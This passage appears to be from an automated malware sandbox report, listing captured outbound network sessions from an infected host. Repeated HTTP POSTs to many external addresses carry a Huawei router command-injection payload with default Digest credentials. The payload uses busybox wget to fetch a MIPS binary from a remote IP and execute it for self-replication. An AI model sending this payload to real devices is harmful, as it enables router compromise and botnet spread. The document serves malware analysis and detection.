[TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2074192.168.2.2340494157.94.98.12037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.607929945 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2075192.168.2.2357440197.91.138.24437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.608527899 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2076192.168.2.234479041.48.203.3137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.608556986 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2077192.168.2.234291457.51.121.937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.608611107 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2078192.168.2.2343112197.216.12.20037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.609174013 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2079192.168.2.235316641.48.196.21437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.609220982 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2080192.168.2.2358828197.21.14.16037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.609581947 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2081192.168.2.2345428157.233.192.8037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.609736919 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2082192.168.2.2349562121.162.125.2637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.609909058 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2083192.168.2.2347600157.86.162.22837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.609989882 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2084192.168.2.2357904134.223.39.3437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.610044956 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
